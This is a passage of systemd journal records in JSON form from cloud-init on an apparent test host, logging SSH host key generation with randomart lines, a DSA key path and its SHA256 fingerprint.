"b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +B*+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=293;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c654081db1fa9273", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o.=+.+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=294;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f53676ea4700ae3c", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| * .B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=295;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=31ca3380fd6da014", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . oo = + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=296;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ce99318b887eb5d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . E ..SO * |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=297;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=10838fe541ff893b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . = oo O |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=298;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c0e449122af7cdb4", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +.= o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=299;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=55377504886d45e3", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| oo+.o. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29a;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=23834d86ee1d4954", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .***o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d4bb71a15fccef51", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private dsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d0a88cda53bddb19", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_dsa_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2a7073f3626f089b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_dsa_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=84c15c05befb1e39", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=401634972dd94bba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[DSA 1024]----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a83f8735ae8f9030", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . .oo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=dbae0df9fa9d5f8e", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|..o o=.. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a516beba4bfef383", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.+. +.+ oE+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=45b99d8cac7df288", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo=oo= * = o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4b3fe0ad6ac79608", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|+=o+o.o S + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=9d48e74fac6405ae", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o.+. . = + o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bef29980580dbf8", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.o . . B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2aa;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8ac3dd8ded6f813a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", 